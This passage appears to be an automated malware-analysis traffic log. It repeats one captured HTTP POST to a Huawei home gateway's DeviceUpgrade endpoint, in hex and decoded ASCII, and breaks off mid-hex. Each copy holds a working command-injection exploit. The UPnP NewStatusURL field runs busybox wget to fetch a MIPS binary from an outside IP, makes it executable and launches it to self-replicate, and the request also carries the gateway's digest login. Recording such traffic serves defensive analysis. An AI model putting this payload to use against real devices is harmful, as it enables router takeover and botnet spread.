75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 